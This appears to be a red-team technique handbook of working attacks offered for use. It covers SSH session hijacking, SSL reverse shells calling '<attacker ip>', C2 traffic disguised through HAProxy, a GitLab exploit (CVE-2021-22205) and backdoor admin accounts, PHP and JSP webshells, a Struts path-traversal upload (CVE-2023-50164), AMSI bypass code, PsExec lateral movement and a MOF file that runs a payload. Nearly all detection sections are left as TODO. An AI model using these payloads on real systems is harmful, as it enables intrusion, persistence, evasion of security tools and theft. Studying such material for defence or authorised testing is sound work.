Table of Contents


Contributors

SSH Hijacking

SSH Hijacking With SSH-Agent Forwarding

Summary

SSH-Agent is a utility that keeps track of a user's private keys and allows them to be used without having to repeat their passphrases on every connection. SSH agent forwarding is a mechanism that allows a user to use the SSH-Agent on an intermediate server as if it were their own local agent on their originating machine. This is useful in situations where a user might need to ssh from an intermediate host into another network segment, which can't be directly accessed from the originating machine. It has the advantage of not requiring the private key to be stored on the intermediate server and the user does not need to enter their passphrase more than once.

SSH Hijacking is when you take control over the existing SSH session using the socket that gets created. In this scenario, the user will be logged into the intermediate server that's handling the SSH-Agent. Due to the intermediate server assuming the logged in user has already entered the passphrase(s) for the target computers, this technique allows an attacker to log in to every system that trusts the intermediate server without knowing the passphrase to the private key file.

Prerequisites

A client, intermediate server, and at least one target must be used for this attack, each one requires SSH to be installed and must support SSH-Agent Forwarding. The client must be logged into the intermediate server and has entered the passphrase at least once, and must not close their connection to the server.

Setup

In this setup, there will be three hosts; client, intermediate, and target. The intermediate host will house the SSH-Agent forwarding. The public key needs to be installed on both intermediate and target. The keys can be generated and uploaded with the following commands on the client:

ssh-keygen
ssh-copy-id -i /path/to/created/key.pub user@intermediate
ssh-copy-id -i /path/to/created/key.pub user@target

Next, SSH needs to be told to use a forwarded agent. Ensure the following is set in ~/.ssh/config:

ForwardAgent yes

Activate the agent and add the generated keys with the following commands on the client, ssh-add will prompt for the passphrase for the key:

eval `ssh-agent`
ssh-add /path/to/created/key.pub

Now, on the intermediate server, the following must be set in /etc/ssh/sshd_config:

AllowAgentForwarding yes

The client must log into the intermediate server, and keep this connection alive. The client must also enter the passphrase at least once so that SSH-Agent will remember the client being authenticated, so it will not prompt for the passphrase during execution.

Execution

Method 1 - Low Privileges

This method only works if the user you have compromised has an active SSH session to the intermediate server, if you can not authenticate as the user that does have the session, then you will need root privileges.

Since you are effectively the user you have compromised, simply running the following commands will allow you to gain access to any target system that's been configured for SSH-Agent Forwarding for this user:

ssh user@intermediate # On the client
ssh user@target # On the intermediate server

Indicators of Compromise

TODO

Method 2 - Root Privileges

One way to perform this method is simply to use the su or sudo command to become that user, and then following method 1. However, to avoid running these commands as they do populate logs on Linux by default, this method will outline how to do it from root alone FROM THE INTERMEDIATE SERVER.

The first step is to find an active SSH session as any user on the box, and fetching the environment variables from all of it's children PID's. This can be done with the following commands:

ps aux | grep ssh  # Find the user who has an active session
pstree -p user | grep ssh # Find the list of PID's following that session
cat /proc/PID/environ | tr '\0' '\n' | grep "SSH"

If the output from the last command contains "SSH_AUTH_SOCK", then it's value will likely work for this method. It should contain a file path to a socket, to abuse this as root (or if the file permissions on the socket are insecure somehow) then the following commands can be used:

SSH_AUTH_SOCK=/tmp/ssh-randomstring/agent.number ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-randomstring/agent.number ssh user@target

Indicators of Compromise

TODO

Hijacking SSH With ControlMaster

Summary

ControlMaster is a feature that enables sharing of multiple SSH sessions over a single network connection. This functionality can be enabled for a given user by editing their local SSH configuration file in ~/.ssh/config. This will create a socket that can be used without authentication on the client.

Prerequisites

A client must have SSH installed, with the ability to configure ControlMaster, and the connection must have been made at least once depending on the ControlPersist setting used.

Setup

To configure ControlMaster, place the following into the clients local SSH config, located at ~/.ssh/config:

Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m

if ControlPersist is set to yes, it will never close even when the SSH connection is closed. Otherwise, it will last for the duration this is set to after the connection is closed.

Execution

Method 1 - Using the ControlMaster Socket

To abuse this, run the following command on the client to hijack the ControlMaster socket:

ssh -S /home/user/.ssh/controlmaster/user\@target\:port user@target

Indicators of Compromise

TODO

Reverse Shells

Netcat with SSL

Summary

This will outline how to use a normal netcat shell except the traffic is encrypted with SSL.

Prerequisites

Any operating system that has NMAP support, as the ncat package is shipped with NMAP.

Setup

Install NMAP and ensure the ncat command is present

Execution

Method 1 - Reverse Shell Listener Linux/Mac

Start up the reverse shell listener with the following command:

ncat --ssl -lvnp <port>

If the target has ncat as well, run the following command on the target:

ncat --ssl <attacker ip> <attcker port>

Otherwise, if they have openssl on linux/mac, use the following command:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | openssl s_client -connect <attacker ip>:<attacker port> 2>&1 > /tmp/f & disown

Indicators of Compromise

TODO

Method 2 - Reverse Shell Listener Windows

I highly recommend you use the following command, but if you don't want or need rlwrap, simply omit it from the following command:

rlwrap ncat --ssl -lvnp <port>

If the target has ncat as well, run the following command on the target:

ncat --ssl <attacker ip> <attcker port>

Otherwise, you can use these powershell reverse shells, either "TCPReverseSSL-AddType" or "TCPReverseShell-Reflective" (AddType drops stuff to disk, reflective is less portable and may require tinkering), and then run them through a powershell cradle or otherwise to fetch a reverse shell.

Indicators of Compromise

TODO

Upgrading Shells with Magic

Summary

When using a raw shell, using netcat or something similar, usually this shell does not have an associated TTY, and can be killed accidentally with Ctrl+C. There are a few ways to fix both of these issues to stabilize the shell.

Prerequisites

Some form of raw shell, C2 frameworks won't work with the magic portion, but may work with the TTY portion.

Setup

Obtain a shell from a linux or mac based host through some means. If you have a windows shell, then fetch another by wrapping your listener with the rlwrap command. That's the best you'll get on Windows.

Execution

Method 1 - Python TTY + Magic

The first step is to obtain a working TTY in the shell using python, use the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

With a TTY created, we can perform "Magic" to upgrade the shell such that Ctrl+C, tab completion, etc, gets forwarded to the shell instead of being handled locally.

First, press Ctrl+Z to background the process. Then, run the following command and note down the rows and columns from the output:

stty -a

Now, run the following command. The semicolon is important:

stty raw -echo; fg

Press enter to regain control of the netcat shell, and then run the following commands:

reset
export TERM=xterm
stty rows <rows> cols <columns>

Now, your reverse shell should function like any other shell, with tab completion and Ctrl+C support, you should also be able to clear the screen and use editors like vim. If you resize the terminal, you may need to update the rows and columns with stty.

Indicators of Compromise

TODO

Method 2 - Script TTY + Magic

The first step is to obtain a working TTY in the shell using script, use the following command:

script -q /dev/null -c /bin/bash

With a TTY created, we can perform "Magic" to upgrade the shell such that Ctrl+C, tab completion, etc, gets forwarded to the shell instead of being handled locally.

First, press Ctrl+Z to background the process. Then, run the following command and note down the rows and columns from the output:

stty -a

Now, run the following command. The semicolon is important:

stty raw -echo; fg

Press enter to regain control of the netcat shell, and then run the following commands:

reset
export TERM=xterm
stty rows <rows> cols <columns>

Now, your reverse shell should function like any other shell, with tab completion and Ctrl+C support, you should also be able to clear the screen and use editors like vim. If you resize the terminal, you may need to update the rows and columns with stty.

Indicators of Compromise

TODO

Obfuscating JA3 Hashes with HAProxy

Summary

JA3 fingerprinting is a methodology for identifying attributes about a TLS connection and representing that information with an MD5 hash. These hashes can used to identify non-standard and potentially malicious traffic on a network. For example, the JA3 hash for most legitimate web traffic will be identical, whereas that of C2 traffic could either be unique and thus questionable, or exactly the same as other known C2 signatures and easily identifiable. While not exceptionally reliable, this is often used as a detection rule for intrusion detection systems (such as Suricata), or as an analytic for data driven monitoring and so should be obfuscated if possible.

The solution to the abnormal JA3 hashes produced by C2 traffic is to encapsulate it within HTTPS traffic directed towards a load balancer. The load balancer will then redirect the encapsulated C2 traffic to the C2 server, and when the C2 server reaches back to the load balancer it will once again get redirected under the guise of legitimate traffic. Since load balancers are very common technologies within web stacks, this will allow the JA3 hash of C2 traffic to blend in with normal web traffic. Furthermore, since this is a layer in front of the C2 server, it should be platform agnostic provided that the C2 platform supports HTTPS beaconing.

Prerequisites

  • Linux VM (Ideally with the apt package manager)
  • A C2 server (Can be running on the aforementioned Linux VM)

Setup

Initial Setup

  1. Install haproxy via your distribution's package manager (sudo apt-get install haproxy with apt)
  2. Open the haproxy configuration file at /etc/haproxy/haproxy.cfg using your text editor of choice
The file layout will look like this:
====

global
	xxxx
	xxxx

defaults
	xxxx
	xxxx

====

For the purposes of this guide, the non-tabbed portions (global and default) will be referred to as sections. You can ignore the two existing sections, but editing them may be useful for fine tuning.
  1. At the bottom of the file, add a new section called frontend myfrontend and format it as laid out below. This will be the address and port that the load balancer is listening for traffic on.
defaults
	xxxx
	xxxx

frontend myfrontend
	default_backend myserver
	bind 0.0.0.0:8080
  1. Save and exit the configuration file and restart HAProxy using systemctl restart haproxy, if you see any errors you likely have a syntax error.
  2. Verify that your configuration is working by running curl 127.0.0.1:8080. This command should return a 503 Service Unavailable "No server is available to handle this request." error.
  3. Re-open the configuration file and add the following configuration at the end of the file. This will be the destination where traffic will be redirected to.
frontend myfrontend
	default_backend myserver
	bind 0.0.0.0:8080

backend myserver
	server server1 127.0.0.1:8000
  1. Save and exit the configuration file and restart HAProxy using systemctl restart haproxy.
  2. In another terminal/tab, start a python webserver with the command python3 -m http.server --bind 127.0.0.1 8000.
  3. Verify the redirection using curl 127.0.0.1:8080. The output of this command should be the filenames in the directory where the webserver is being hosted. If you are still getting a 503 Service Unavailable error, ensure that you have the default_backend under the frontend section set correctly.
  4. You can now redirect unencrypted HTTP traffic by adjusting the frontend and backend values.

Generating SSL Certificates

  1. Generate a private key using `openssl genpkey -algorithm RSA -out pkey.pem.
  2. Generate a certificate signing request using openssl req -new -key pkey.pem -out csr.pem.
  3. Generate a self signed certificate using `openssl x509 -req -days 365 -in csr.pem -signkey pkey.pem -out cert.pem.
  4. Create a new file using touch tls.pem.
  5. Add the cert.pem to tls.pem using cat cert.pem >> tls.pem.
  6. Add the private key information to tls.pem using sudo cat pkey.pem >> tls.pem.

Configuring TLS

  1. Open the configuration file from earlier and modify the following lines. This will change the frontend bind address to be any interface on port 443, and will assign the listed ssl cert to the port.
frontend myfrontend
	default_backend myserver
	bind 0.0.0.0:443 ssl cert /path/to/tls.pem

  1. Save and exit the configuration file and restart HAProxy using systemctl restart haproxy. If you get an error, ensure that you properly combined the two .pem files from earlier into a single file, and that your path is correct.

Execution

Method 1 - Utilizing HAProxy

  1. Modify the configuration file from earlier to be representative of your listener address as follows (the pound signs are just comments).
backend myserver
	server server1 127.0.0.1:6969
	# ^ Your C2 listener will be set up on this port (6969) 
  1. Generate an http/s (https if your platform supports it) beacon pointing towards the server running HAProxy and your C2 server at the port defined in your frontend section (443 using the example from setup)
  2. Set up an http/s listener on your C2 server listening on the port defined in the backend section (6969 using the example from earlier)
  3. Execute your beacon on a target box and ensure you get a callback. If you want to verify that the traffic is TLS, observe the traffic in wireshark and ensure that you are seeing a Client Hello followed by a Server Hello pointed towards the HAProxy frontend address and port. Wireshark should also show you the JA3 hash.

Indicators of Compromise

The indicators of compromise for this action would be the same as HTTPS beaconing, but it should help in defeating JA3 hash based detection. The traffic will likely be using a self signed SSL certificate, which may be an indicator that the destination is illegitimate.

Web

Gitlab

Adding a Backdoor User

Summary

Having a user on a gitlab instance can open up a lot of interesting opportunities, especially if that user is an admin. For example, this user can modify existing repositories and place backdoors in projects, or even add pre-build commands to visual studio projects.

Prerequisites

A gitlab instance is required, as well as some form of shell access. This can be obtained with, for example, CVE-2021-22205.

Setup

N/A

Execution

Method 1 - Rails Console

gitlab-rails console

In the console, run the following commands to add an admin user:

u = User.new(username: 'username', email: 'username@test.com', name: 'username', password: 'password', password_confirmation: 'password')
u.skip_confirmation!
u.admin = true
u.save!

If you want a normal user and not an admin user, omit the u.admin = true command.

You should now be able to sign in with the credentials you created:

image

Indicators of Compromise

TODO

ExifTool DjVu (CVE-2021-22205)

Summary

CVE-2021-22205 affects exiftool's DjVu "Copyright" metadata field that results in code execution. In Gitlab EE/CE versions starting from 11.9 and patched in 13.10.3, 13.9.6, and 13.8.8, an attacker is able to upload an image to the /uploads/user unauthenticated, where the image is then analyzed by the vulnerable version of exiftool. The resulting code is executed as the git user, which provides full access to the gitlab instance, including the administrator gitlab-rails console.

Prerequisites

The prerequisite for the setup is to have docker installed and running. For the attack path, the only prerequisite is a vulnerable version of Gitlab installed.

Setup

First, clone or grab the gitlab-setup.sh file from this repository.

To perform an online install of the vulnerable Gitlab instance, run the following command (Set the hostname to your preference, or to the IP of the interface you wish to host this on):

./gitlab-setup.sh -v 13.8.6-ce.0 -H gitlab.example.com

By default, the docker will start automatically on the specified hostname.

To perform an offline installation, first run the following command on a machine that DOES have an internet connection:

./gitlab-setup.sh -v 13.8.6-ce.0 -e --fetch-only

Then, move BOTH the gitlab-setup.sh file and the resulting gitlab-ce-13.8.6-ce.0.docker file to the offline machine.

Once the files have been moved over, install and start the Gitlab instance by running the following command on the offline machine:

./gitlab-setup.sh -i /path/to/gitlab-ce.13.8.6-ce.0.docker -H gitlab.example.com

Then, browse to the page given the specific hostname, and set the administrator password. Once it's been set, the instance will be fully functional. Be sure to log in and adjust any settings, add users, and/or add any repositories that are needed.

Execution

Method 1 - Reverse Shell

To exploit a vulnerable instance of Gitlab, first clone this repository, or download the bash script.

First, start a local netcat listener on your port of choice:

nc -lvnp 1337

Then, to obtain a shell, simply run the following command:

./cve-2021-22205.sh -t http://gitlab.example.com -i <your interface IP> -p <your specified port>

Alternatively, the script will deduce the IP for you and the port will be assumed to be 1337 if unspecified.

image

Indicators of Compromise

TODO

Method 2 - Any Command

To exploit a vulnerable instance of Gitlab, first clone this repository, or download the bash script.

To run a custom command against the target, run the following command:

./cve-2021-22205.sh -t http://gitlab.example.com -c "<your command here>"

Indicators of Compromise

TODO

Visual Studio CSPROJ Reverse Shell

Summary

Visual Studio .csproj files contain the ability to run pre-build and post-build commands during compile time of the project. This feature becomes a vulnerability if the project itself is accessible by a malicious actor, such as a compromised developer account gaining access to the projects git repository.

Prerequisites

This requires visual studio to compile the malicious project, and some form of repository hosting is recommended.

Setup

You can either download the malicious visual studio project zip file, or you can follow these steps to create it yourself. If you're modifying an existing repository, skip to step 2.

Step 1: Create the project using .NET 6.0 (Recommended):

image

image

Step 2: Go to the project properties:

image

Step 3: Go to Build -> Events

image

Step 4: Add your pre-build command

image

Execution

Method 1 - Compilation

If the target repository is in a git repo, push the changes with the following 2 commands:

git add -A .
git commit -m "Your Message Here"
git push

In every scenario, someone needs to compile this repository to execute the pre-build command.

Indicators of Compromise

TODO

PHP

Basic PHP Webshell Oneliner

Summary

One of the easiest methods to obtain access to a PHP enabled app, is to somehow plant a webshell onto the server. There are many fancy PHP webshells out there, but this page will cover a basic one that is easy to remember and type, and is easy to embed into an existing PHP file as a backdoor.

Prerequisites

A PHP enabled server, typically apache.

Setup

To set this up, all that is needed is access to a PHP enabled server somehow. This can be through a vulnerability or any other type of access.

Execution

Method 1 - Shortest Possible

This is the shortest possible PHP webshell, the output from commands ran are not very pretty and will likely get mangled:

<?php system($_GET('cmd')); ?>

To use this webshell, the command must be url encoded and must be formatted like so:

curl http://ip/shell.php?cmd=whoami
curl http://ip/shell.php?cmd=ip$20a

Indicators of Compromise

TODO

Method 2 - Slightly Prettier

This basic webshell wraps the output of the command into HTML pre tags, this will usually help prevent the output of the command from being mangled on the page.

<?php echo "<pre>"; system($_GET('cmd')); echo "</pre>"; ?>

To use this webshell, the command must be url encoded and must be formatted like so:

curl http://ip/shell.php?cmd=whoami
curl http://ip/shell.php?cmd=ip$20a

Indicators of Compromise

TODO

PHP Filter Gadget Chain

Summary

A PHP Filter Gadget Chain is a technique used to obtain PHP code execution against a PHP-enabled web server, when the attacker is able to control the input to a require() or include() function call.

Prerequisites

A PHP enabled web server, alongside some vulnerable code.

Setup

Either of the following function calls are vulnerable to this attack. As long as the attacker-controlled input is not mangled too heavily prior to the include or require function calls, then this attack should still work. Ideally the input is not mangled at all.

include($_GET['page'])
# OR
require($_GET['page'])

The chain requires that extension=iconv is set in the php.ini file, this is usually /etc/php/php.ini

This can be tested by performing the following request to see if any output is produced:

curl http://ip/index.php?page=php://filter/convert.base64-encode/resource=/etc/hostname

If the base64 encoded hostname is rendered to the site, then this RCE is possible.

Execution

Method 1 - PHP Filter Gadget Chain Generator

Using this repository, and any PHP code that can lead to code execution on the target (see Basic PHP Webshell Oneliner), the following command can be used to exploit the target:

python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>' | tail -n1

gadget chain

Then, it's possible to run commands by using the following command:

curl http://ip/index.php?page=<gadget chain>&cmd=<reverse shell oneliner>

Indicators of Compromise

TODO

Apache

Apache Struts RCE (CVE-2023-50164)

Summary

This vulnerability allows for an attacker to manipulate file upload parameters to enable path traversal affecting the destination of the uploaded file. Under some circumstances this can lead to uploading a malicious file which can be used to perform remote code execution. This affects Struts versions 2.0.0-2.3.3 (EOL), 2.5.0-2.5.32, and 6.0.0-6.3.0.1. This vulnerability is fixed by Struts versions 2.5.33 or greater and 6.3.0.2 or greater

Prerequisites

This requires a web server hosting a vulnerable web application using Struts ActionSupport and offering file upload functionality. Furthermore, to gain remote code execution, the application server implementing the server side upload logic needs to upload the file to the local filesystem of the webserver and have write permissions to a sensitive directory that would be useful to an attacker such as the webroot to upload a JSP webshell.

Additional Details on Mitigating Factors/Prerequisites

Setup

Exploit Analysis and Lab Setup for Linux and Tomcat 9

For this example setup, I used a Windows Host with Tomcat, however this exploit can also be conducted on Linux or with another Servlet of your choice. This will mostly affect the target directories for path traversal and the method of gaining RCE.

JDK 17 - Windows Install

Apache Tomcat Requires Java(JDK). Version 17 was used during emulation and confirmed to work

First, if you do not have it already, you need to install JDK 17: JDK 17 Install

You can check this with java --version

Maven - Windows Install

Usage is for compiling webapps into .war for deployment. Can run on Windows or Linux and transfer compiled .war file to desired destination

Next, you'll also need to install maven. Below are guides that detail the installation and configuration process

Maven Windows Install and Setup

Maven Linux Install and Setup

Tomcat - Windows Install and Deploy

WARNING: Tomcat Versions higher than 9 will produce an error due to Servlet API version conflict between Struts and Tomcat

Next, you'll need to install tomcat and configure the service to host the web applications. The easiest way to do this for windows is to use the Windows Service Installer. Tomcat Install

  • Make sure you have JDK installed beforehand, as you will need it to finish installation
  • When going through the installer wizard, make sure to set an administrator user and password so as to access the manager app. If you miss this step, you can add/manage users in the tomcat-users.xml file

By default, the installer should create a new service named something similar to Apache Tomcat 9.0 Tomcat9. Make sure this is running, and for ease of use, you can configure it to run automatically on startup.

When this is running, your website should be accessible! Go to 127.0.0.1:8080 in the web browser to check. >NOTE: By default, tomcat hosts on port 8080. To change this, you can edit the server.xml file in the conf folder

Successful Tomcat Deployment

NOTE: If trying to access from an external machine, such as a kali box, make sure that your networking/DNS is properly configured and that the boxes can communicate, as well as check that no firewalls/filtering are blocking the port/traffic. If hosting on a Windows host, you'll likely need to either disable or modify Windows Defender Firewall rules to allow traffic through to the port you are hosting Tomcat on

Compile and Deploy Vulnerable File Upload Application

For this environment, we'll deploy a basic file upload application that uses a vulnerable version of Apache Struts

Github POC Exploit and Vulnerable Struts App

Download the struts-app folder and contents from the above link. Within the struts-app folder, run:

mvn clean package

This should produce an upload-1.0.0.war within a newly created target subdirectory. To deploy this application, go to the tomcat manager app in the webserver. Find the "Deploy" section, upload the file, and click Deploy

NOTE: Manager app is only accessible from the localhost by default

Tomcat Manager Make sure that the upload-1.0.0 application is started, and then it should be accessible from 127.0.0.1/upload-1.0.0/upload.action on the website

File upload application

Congrats! Your environment is now ready for exploitation

Execution

Method 1 - Manual Exploitation

Prepare a Webshell to Upload

To gain RCE on Tomcat, we will need to upload a .war webshell to the webapps directory. Similar to how we deployed the upload-1.0.0.war, this will allow us to deploy our own malicious application. You can create your own malicious application, or use the basic jsp webshell below

Basic jsp webshell:

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd, null, null);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) {
                output += s + "\n";
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
%>
<%=output %>

Save to webshell.jsp, and convert into a .war file:

jar -cvf webshell.war webshell.jsp`

This should create webshell.war, which we'll use to deploy our malicious application

Use Burp to modify upload parameters

Using a Burp Proxy, go to the file upload application you deployed earlier. Click on Choose File and select webshell.war. Turn on intercept in Burp, and click Submit. Burp should intercept the packet containing your uploaded file data. Send the HTTP POST packet to Repeater, where we will modify 2 of the parameters:

  • Set name="upload to name="Upload
  • Add a new upload parameter:
Content-Disposition: form-data; name="uploadFileName"; 

..\..\..\..\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\webshell.war

NOTE: Make sure to modify the form boundaries as well, appending a copy of the one ending with "--" to the end of the packet, and removing the "--" from the original. The image below contains an example of what this looks like when completed

Modified HTTP Packet Send this modified packet, and your webshell should be deployed to Tomcat's webapp directory! To check if our exploit worked and interact with out webshell, we can use the cmd variable at {0.0.0.0:8080}/webshell/webshell.jsp?cmd=whoami

whoami Command run by webshell >NOTE: >Default deployment will create a directory with the .war's name containing the jsp file we compiled. > >Ex: jar -cvf warname.war jspname.jsp will be accessible at /warname/jspname.jsp

Indicators of Compromise

  • Http traffic containing the "Upload" and "uploadFileName" parameters
  • Http traffic containing ../ characters
  • New or unusual files created/uploaded by the web service to unintended/unexpected locations (Outside of designed upload destination)
    • In particular, the creation of .war files in Tomcat's webapps directory (or a similar event in another servlet) and/or associated deployment of unauthorized web applications

Linux

Linux Privilege Escalation

SUDO/SUID/etc

Summary

One of the easiest and quickest privilege escalation techniques is to check if there is a vulnerable misconfiguration in the /etc/sudoers file, or if a known program contains the set-UID bit that may retain privileges. There are more than just sudo or SUID vulnerabilities on GTFOBins, so review the website for any additional abuse of privileges.

Prerequisites

The only prerequisite is that the box has either sudo or SUID support for either of those specific vulnerabilities, though these are not the only vulnerabilities that could lead to privesc.

Setup

To configure a box to be vulnerable to one of these methods, check https://gtfobins.github.io/ and select the binary and vulnerability type that you'd like to implement.

Execution

Method 1 - SUDO

For this method, the users password must be known or the user must have the NOPASSWD flag set in /etc/sudoers, i.e.:

...

root ALL=(ALL:ALL) ALL
# EVERYTHING ran without a password
user1 ALL=(ALL:ALL) NOPASSWD: ALL
# Specific program doesnt require a password
user2 ALL=(ALL:ALL) NOPASSWD: /usr/bin/vi
...

Then simply click "SUDO" or type "+sudo" followed by the program(s) listed in the output of sudo -l. Then follow the specific instructions for that binary to exploit the misconfiguration.

image

Indicators of Compromise

TODO

Method 2 - SUID

This method is almost identical to sudo, but rather than running sudo -l, the following command(s) can be used to determine if the SUID bit is set:

# The program will run as the owner of the file
find / -perm -4000 -ls 2>/dev/null

# The program will run as the group of the file
find / -perm -2000 -ls 2>/dev/null

# The program will run as both the owner and the group
find / -perm -6000 -ls 2>/dev/null

Once a program has been identified from one or more of the commands above, plugging them into GTFOBins with "+suid" will determine if the machine is vulnerable to this misconfiguration.

Indicators of Compromise

TODO

Windows

Powershell AMSI Bypass

Summary

AMSI (Antimalware Scan Interface) is used to monitor several processes under Windows that can be used to run commands, such as powershell and jscript. Under powershell, there are several methods that can be used to bypass this technology, which will prevent Windows Defender from stopping the powershell process whilst executing a malicious script. The following is an example of AMSI when it's functioning properly:

AMSI Functioning

Prerequisites

Windows Defender (or another AV that implements AMSI) must be running and must be active. Further, the ability to execute powershell against the target is required.

Setup

N/A

Execution

Method 1 - Nulling the AMSI Context

This method is used to null out the pointer that AMSI uses to keep track of its current context. Instead of crashing the process or preventing any command from being executed, all commands will be allowed to execute even if they are malicious. This technique can be done from powershell itself, and needs no external utility.

Use the following powershell code to bypass AMSI:

foreach($x in [Ref].Assembly.GetTypes()){if($x.Name -like '*iUtils'){$a=$x}}
foreach($x in $a.GetFields('NonPublic,Static')){if($x.Name -like '*Context'){$c=$x}}
[IntPtr]$ptr=$c.GetValue($null)
[Int32[]]$buf=@(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

Now the 'amsiutils' test string should not trigger defender:

Bypass AMSI

Indicators of Compromise

TODO

Method 2 - Telling AMSI that init Failed

Similar to method 1, only powershell is needed for this technique. Instead of corrupting the AMSI context pointer, it's possible to convince AMSI that it's initialization failed.

Use the following powershell to bypass AMSI:

foreach($x in [Ref].Assembly.GetTypes()){if($x.Name -like '*iUtils'){$a=$x}}
foreach($x in $a.GetFields('NonPublic,Static')){if($x.Name -like '*iInitFailed'){$i=$x}}
$i.SetValue($null, $true)

Now the 'amsiutils' test string should not trigger defender:

Bypass AMSI via Init

Indicators of Compromise

TODO

Windows Stealth

Windows Reflective PE Loader

TODO

Windows Lateral Movement

PsExec

Summary

PsExec is a light-weight telnet-replacement that lets you execute processes on other Windows systems, complete with full interactivity for console applications, without having to manually install client software.

Prerequisites

The target must be a Windows based operating system, and the C$ or ADMIN$ share (or equivalent share into C:\Windows\System32) must be writable. If a network share is not available, see MOF Upload, an alternative to PsExec.

Setup

To set up, either obtain and utilize Administrator credentials to the share(s) in question, or make them writable by modifying user permissions in the Sharing tab on windows. To create a user that can access C$ or ADMIN$, use the following command as Administrator:

net user kevin.beacon securepassword /add
net localgroup Administrators kevin.beacon /add

If within an active directory environment, you may add the user to either "Domain Admins" for the current tree in the forest, or "Enterprise Admins" for the entire forest.

net group "Domain Admins" kevin.beacon /add /domain
net group "Enterprise Admins" kevin.beacon /add /domain

Execution

Method 1 - Sysinternals

From a Windows client, the Sysinternals suite can be used to execute arbitrary programs on the target machine. Use -s to run the command as NT AUTHORITY\SYSTEM, and use -i to make it interactive, though this will almost certainly break in a reverse shell. Though, using this flag also gives some useful output even when spawning a reverse shell through PsExec, which is why it is listed below.

.\psexec.exe -accepteula -u user -p password -s -i \\remote.server.com cmd /c %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -enc <base64 encoded cradle>

Indicators of Compromise

TODO

Method 2 - Manually PsExecing with SC

From a Windows client, upload the binary you wish to execute on the target and start a remote service with the following commands (there is supposed to be a space after binPath):

copy payload.exe \\remote.server.com\ADMIN$
sc \\remote.server.com create servicename binPath= "C:\Windows\payload.exe"
sc \\remote.server.com start servicename

Indicators of Compromise

TODO

Method 3 - Impacket-PsExec

The impacket library was created in python, so as long as python and impacket are installed, this should work from any OS that supports python.

impacket-psexec DOMAIN/USERNAME:'PASSWORD'@target

If you do not have or know the password, but you do have the NTLM hash, then impacket also supports Pass The Hash (Only place the part of the hash after the colon in this command):

impacket-psexec -hashes :NTHASH DOMAIN/USERNAME@target

Indicators of Compromise

TODO

MOF Upload

Summary

Pre-Windows Vista (Not including vista) have an interesting vulnerability that can be used to gain code execution when two files are written to specific directories using any method. There might be a way of using this Post-Windows Vista, but they don't get auto-compiled anymore. More research is needed.

Prerequisites

A Pre-Windows Vista install is required, and some method of writing to both "C:\Windows\System32" and "C:\Windows\System32\wbem\mof" is required for this exploit.

Setup

Pick any method of allowing the attacker to write to the "C:\Windows\System32" and "C:\Windows\System32\wbem\mof" folders. This exploit can be used as privilege escalation or as initial access. SMB, TFTP, FTP, etc, are all viable setups.

Execution

Method 1 - Auto-compiling MOF

The first step is to upload the intended binary to "C:\Windows\System32", and then to upload a custom MOF file to "C:\Windows\System32\wbem\mof". Replace any instance of "payload.exe" below with the name of the executable uploaded. Below is the file that should be uploaded to the MOF directory:

#pragma namespace("\\\\.\\root\\cimv2")
class MyClass89
{
	[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
	[key] string Name;
	[not_null] string ScriptingEngine;
	string ScriptFileName;
	[template] string ScriptText;
	uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
	Name  = "ActiveScriptEventConsumer";
	CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
	PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
	Provider = $P;
	ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
	Name = "ASEC";
	ScriptingEngine = "JScript";
	ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"payload.exe\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass89\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
	
};
Instance of ActiveScriptEventConsumer as $cons2
{
	Name = "qndASEC";
	ScriptingEngine = "JScript";
	ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\baud.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"payload.exe\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};
instance of __EventFilter as $Filt
{
	Name = "instfilt";
	Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass89\"";
	QueryLanguage = "WQL";
};
instance of __EventFilter as $Filt2
{
	Name = "qndfilt";
	Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"payload.exe\"";
	QueryLanguage = "WQL";
	
};
instance of __FilterToConsumerBinding as $bind
{
	Consumer = $cons;
	Filter = $Filt;
};
instance of __FilterToConsumerBinding as $bind2
{
	Consumer = $cons2;
	Filter = $Filt2;
};
instance of MyClass89 as $MyClass
{
	Name = "ClassConsumer";
};

Once this file is uploaded, then the exe that was uploaded should get executed.

Indicators of Compromise

TODO

WinRM

Summary

WinRM, or Windows Remote Management, is a feature that comes installed on all modern versions of Windows (Windows Server 2008/Windows 7 onwards) which allows remote administration between hosts. Usage of this service requires credentials or the NTLM hash of a user that has remote management permissions.

